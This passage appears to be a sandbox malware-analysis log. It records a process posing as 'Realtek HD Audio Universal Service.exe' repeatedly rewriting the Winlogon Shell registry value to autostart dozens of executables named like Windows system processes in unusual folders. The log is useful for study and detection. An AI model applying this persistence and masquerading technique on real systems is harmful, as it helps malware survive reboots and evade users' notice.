\"C:\\bridgeHyperCrt\\taskhost.exe\", \"C:\\Windows\\RemotePackages\\RemoteDesktops\\lsass.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\taskhost.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\csrss.exe\", \"C:\\MSOCache\\All Users\\taskhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\spoolsv.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Prefetch\\ReadyBoot\\System.exe\", \"C:\\Program Files\\Windows Sidebar\\fr-FR\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\bridgeHyperCrt\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files\\Windows NT\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Windows\\AppPatch\\Custom\\winlogon.exe\", \"C:\\bridgeHyperCrt\\dllhost.exe\", \"C:\\Program Files\\Windows Journal\\smss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Updata.exe\", \"C:\\Windows\\ModemLogs\\Realtek HD Audio Universal Service.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\csrss.exe\", \"C:\\MSOCache\\All Users\\taskhost.exe\", \"C:\\bridgeHyperCrt\\schtasks.exe\", \"C:\\Users\\Default\\Local Settings\\Idle.exe\", \"C:\\bridgeHyperCrt\\WmiPrvSE.exe\", \"C:\\Windows\\SoftwareDistribution\\ScanFile\\schtasks.exe\", \"C:\\Users\\Default User\\dwm.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\winlogon.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\System.exe\", \"C:\\Users\\All Users\\Favorites\\spoolsv.exe\", \"C:\\bridgeHyperCrt\\taskhost.exe\", \"C:\\Windows\\RemotePackages\\RemoteDesktops\\lsass.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\taskhost.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\csrss.exe\", \"C:\\MSOCache\\All Users\\taskhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\spoolsv.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\spoolsv.exe\", \"C:\\Windows\\AppCompat\\Programs\\audiodg.exe\", \"C:\\Users\\Default\\Recent\\lsm.exe\", \"C:\\Users\\All Users\\Microsoft Help\\spoolsv.exe\", \"C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\dwm.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Prefetch\\ReadyBoot\\System.exe\", \"C:\\Program Files\\Windows Sidebar\\fr-FR\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\bridgeHyperCrt\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files\\Windows NT\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Windows\\AppPatch\\Custom\\winlogon.exe\", \"C:\\bridgeHyperCrt\\dllhost.exe\", \"C:\\Program Files\\Windows Journal\\smss.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Prefetch\\ReadyBoot\\System.exe\", \"C:\\Program Files\\Windows Sidebar\\fr-FR\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\bridgeHyperCrt\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files\\Windows NT\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Windows\\AppPatch\\Custom\\winlogon.exe\", \"C:\\bridgeHyperCrt\\dllhost.exe\", \"C:\\Program Files\\Windows Journal\\smss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Updata.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Prefetch\\ReadyBoot\\System.exe\", \"C:\\Program Files\\Windows Sidebar\\fr-FR\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\bridgeHyperCrt\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files\\Windows NT\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Windows\\AppPatch\\Custom\\winlogon.exe\", \"C:\\bridgeHyperCrt\\dllhost.exe\", \"C:\\Program Files\\Windows Journal\\smss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Updata.exe\", \"C:\\Windows\\ModemLogs\\Realtek HD Audio Universal Service.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\csrss.exe\", \"C:\\MSOCache\\All Users\\taskhost.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Prefetch\\ReadyBoot\\System.exe\", \"C:\\Program Files\\Windows Sidebar\\fr-FR\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\bridgeHyperCrt\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files\\Windows NT\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Windows\\AppPatch\\Custom\\winlogon.exe\", \"C:\\bridgeHyperCrt\\dllhost.exe\", \"C:\\Program Files\\Windows Journal\\smss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Updata.exe\", \"C:\\Windows\\ModemLogs\\Realtek HD Audio Universal Service.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\csrss.exe\", \"C:\\MSOCache\\All Users\\taskhost.exe\", \"C:\\bridgeHyperCrt\\schtasks.exe\", \"C:\\Users\\Default\\Local Settings\\Idle.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Prefetch\\ReadyBoot\\System.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Prefetch\\ReadyBoot\\System.exe\", \"C:\\Program Files\\Windows Sidebar\\fr-FR\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\bridgeHyperCrt\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files\\Windows NT\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Windows\\AppPatch\\Custom\\winlogon.exe\", \"C:\\bridgeHyperCrt\\dllhost.exe\", \"C:\\Program Files\\Windows Journal\\smss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Updata.exe\", \"C:\\Windows\\ModemLogs\\Realtek HD Audio Universal Service.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\csrss.exe\", \"C:\\MSOCache\\All Users\\taskhost.exe\", \"C:\\bridgeHyperCrt\\schtasks.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Prefetch\\ReadyBoot\\System.exe\", \"C:\\Program Files\\Windows Sidebar\\fr-FR\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\bridgeHyperCrt\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files\\Windows NT\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Windows\\AppPatch\\Custom\\winlogon.exe\", \"C:\\bridgeHyperCrt\\dllhost.exe\", \"C:\\Program Files\\Windows Journal\\smss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Updata.exe\", \"C:\\Windows\\ModemLogs\\Realtek HD Audio Universal Service.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\csrss.exe\", \"C:\\MSOCache\\All Users\\taskhost.exe\", \"C:\\bridgeHyperCrt\\schtasks.exe\", \"C:\\Users\\Default\\Local Settings\\Idle.exe\", \"C:\\bridgeHyperCrt\\WmiPrvSE.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Prefetch\\ReadyBoot\\System.exe\", \"C:\\Program Files\\Windows Sidebar\\fr-FR\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\bridgeHyperCrt\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files\\Windows NT\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Windows\\AppPatch\\Custom\\winlogon.exe\", \"C:\\bridgeHyperCrt\\dllhost.exe\", \"C:\\Program Files\\Windows Journal\\smss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Updata.exe\", \"C:\\Windows\\ModemLogs\\Realtek HD Audio Universal Service.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\csrss.exe\", \"C:\\MSOCache\\All Users\\taskhost.exe\", \"C:\\bridgeHyperCrt\\schtasks.exe\", \"C:\\Users\\Default\\Local Settings\\Idle.exe\", \"C:\\bridgeHyperCrt\\WmiPrvSE.exe\", \"C:\\Windows\\SoftwareDistribution\\ScanFile\\schtasks.exe\", \"C:\\Users\\Default User\\dwm.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\winlogon.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\System.exe\", \"C:\\Users\\All Users\\Favorites\\spoolsv.exe\", \"C:\\bridgeHyperCrt\\taskhost.exe\", \"C:\\Windows\\RemotePackages\\RemoteDesktops\\lsass.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\taskhost.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\csrss.exe\", \"C:\\MSOCache\\All Users\\taskhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\spoolsv.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\spoolsv.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Prefetch\\ReadyBoot\\System.exe\", \"C:\\Program Files\\Windows Sidebar\\fr-FR\\javaw.exe Java(TM) Platform SE binary.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Prefetch\\ReadyBoot\\System.exe\", \"C:\\Program Files\\Windows Sidebar\\fr-FR\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\csrss.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Prefetch\\ReadyBoot\\System.exe\", \"C:\\Program Files\\Windows Sidebar\\fr-FR\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\bridgeHyperCrt\\javaw.exe Java(TM) Platform SE binary.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Prefetch\\ReadyBoot\\System.exe\", \"C:\\Program Files\\Windows Sidebar\\fr-FR\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\bridgeHyperCrt\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files\\Windows NT\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Windows\\AppPatch\\Custom\\winlogon.exe\", \"C:\\bridgeHyperCrt\\dllhost.exe\", \"C:\\Program Files\\Windows Journal\\smss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\conhost.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Prefetch\\ReadyBoot\\System.exe\", \"C:\\Program Files\\Windows Sidebar\\fr-FR\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\bridgeHyperCrt\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files\\Windows NT\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Windows\\AppPatch\\Custom\\winlogon.exe\", \"C:\\bridgeHyperCrt\\dllhost.exe\", \"C:\\Program Files\\Windows Journal\\smss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Updata.exe\", \"C:\\Windows\\ModemLogs\\Realtek HD Audio Universal Service.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\csrss.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Prefetch\\ReadyBoot\\System.exe\", \"C:\\Program Files\\Windows Sidebar\\fr-FR\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\bridgeHyperCrt\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files\\Windows NT\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Windows\\AppPatch\\Custom\\winlogon.exe\", \"C:\\bridgeHyperCrt\\dllhost.exe\", \"C:\\Program Files\\Windows Journal\\smss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Updata.exe\", \"C:\\Windows\\ModemLogs\\Realtek HD Audio Universal Service.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\csrss.exe\", \"C:\\MSOCache\\All Users\\taskhost.exe\", \"C:\\bridgeHyperCrt\\schtasks.exe\", \"C:\\Users\\Default\\Local Settings\\Idle.exe\", \"C:\\bridgeHyperCrt\\WmiPrvSE.exe\", \"C:\\Windows\\SoftwareDistribution\\ScanFile\\schtasks.exe\", \"C:\\Users\\Default User\\dwm.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\winlogon.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Prefetch\\ReadyBoot\\System.exe\", \"C:\\Program Files\\Windows Sidebar\\fr-FR\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\bridgeHyperCrt\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files\\Windows NT\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Windows\\AppPatch\\Custom\\winlogon.exe\", \"C:\\bridgeHyperCrt\\dllhost.exe\", \"C:\\Program Files\\Windows Journal\\smss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Updata.exe\", \"C:\\Windows\\ModemLogs\\Realtek HD Audio Universal Service.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\csrss.exe\", \"C:\\MSOCache\\All Users\\taskhost.exe\", \"C:\\bridgeHyperCrt\\schtasks.exe\", \"C:\\Users\\Default\\Local Settings\\Idle.exe\", \"C:\\bridgeHyperCrt\\WmiPrvSE.exe\", \"C:\\Windows\\SoftwareDistribution\\ScanFile\\schtasks.exe\", \"C:\\Users\\Default User\\dwm.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\winlogon.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\System.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Prefetch\\ReadyBoot\\System.exe\", \"C:\\Program Files\\Windows Sidebar\\fr-FR\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\bridgeHyperCrt\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files\\Windows NT\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Windows\\AppPatch\\Custom\\winlogon.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Prefetch\\ReadyBoot\\System.exe\", \"C:\\Program Files\\Windows Sidebar\\fr-FR\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\bridgeHyperCrt\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files\\Windows NT\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Windows\\AppPatch\\Custom\\winlogon.exe\", \"C:\\bridgeHyperCrt\\dllhost.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Prefetch\\ReadyBoot\\System.exe\", \"C:\\Program Files\\Windows Sidebar\\fr-FR\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\bridgeHyperCrt\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files\\Windows NT\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Windows\\AppPatch\\Custom\\winlogon.exe\", \"C:\\bridgeHyperCrt\\dllhost.exe\", \"C:\\Program Files\\Windows Journal\\smss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Updata.exe\", \"C:\\Windows\\ModemLogs\\Realtek HD Audio Universal Service.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\csrss.exe\", \"C:\\MSOCache\\All Users\\taskhost.exe\", \"C:\\bridgeHyperCrt\\schtasks.exe\", \"C:\\Users\\Default\\Local Settings\\Idle.exe\", \"C:\\bridgeHyperCrt\\WmiPrvSE.exe\", \"C:\\Windows\\SoftwareDistribution\\ScanFile\\schtasks.exe\", \"C:\\Users\\Default User\\dwm.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Prefetch\\ReadyBoot\\System.exe\", \"C:\\Program Files\\Windows Sidebar\\fr-FR\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\bridgeHyperCrt\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files\\Windows NT\\javaw.exe Java(TM) Platform SE binary.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Prefetch\\ReadyBoot\\System.exe\", \"C:\\Program Files\\Windows Sidebar\\fr-FR\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\bridgeHyperCrt\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files\\Windows NT\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Windows\\AppPatch\\Custom\\winlogon.exe\", \"C:\\bridgeHyperCrt\\dllhost.exe\", \"C:\\Program Files\\Windows Journal\\smss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Updata.exe\", \"C:\\Windows\\ModemLogs\\Realtek HD Audio Universal Service.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Prefetch\\ReadyBoot\\System.exe\", \"C:\\Program Files\\Windows Sidebar\\fr-FR\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\bridgeHyperCrt\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files\\Windows NT\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Windows\\AppPatch\\Custom\\winlogon.exe\", \"C:\\bridgeHyperCrt\\dllhost.exe\", \"C:\\Program Files\\Windows Journal\\smss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Updata.exe\", \"C:\\Windows\\ModemLogs\\Realtek HD Audio Universal Service.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\csrss.exe\", \"C:\\MSOCache\\All Users\\taskhost.exe\", \"C:\\bridgeHyperCrt\\schtasks.exe\", \"C:\\Users\\Default\\Local Settings\\Idle.exe\", \"C:\\bridgeHyperCrt\\WmiPrvSE.exe\", \"C:\\Windows\\SoftwareDistribution\\ScanFile\\schtasks.exe\", \"C:\\Users\\Default User\\dwm.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\winlogon.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\System.exe\", \"C:\\Users\\All Users\\Favorites\\spoolsv.exe\", \"C:\\bridgeHyperCrt\\taskhost.exe\", \"C:\\Windows\\RemotePackages\\RemoteDesktops\\lsass.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\taskhost.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\csrss.exe\", \"C:\\MSOCache\\All Users\\taskhost.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Prefetch\\ReadyBoot\\System.exe\", \"C:\\Program Files\\Windows Sidebar\\fr-FR\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\bridgeHyperCrt\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files\\Windows NT\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Windows\\AppPatch\\Custom\\winlogon.exe\", \"C:\\bridgeHyperCrt\\dllhost.exe\", \"C:\\Program Files\\Windows Journal\\smss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Updata.exe\", \"C:\\Windows\\ModemLogs\\Realtek HD Audio Universal Service.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\csrss.exe\", \"C:\\MSOCache\\All 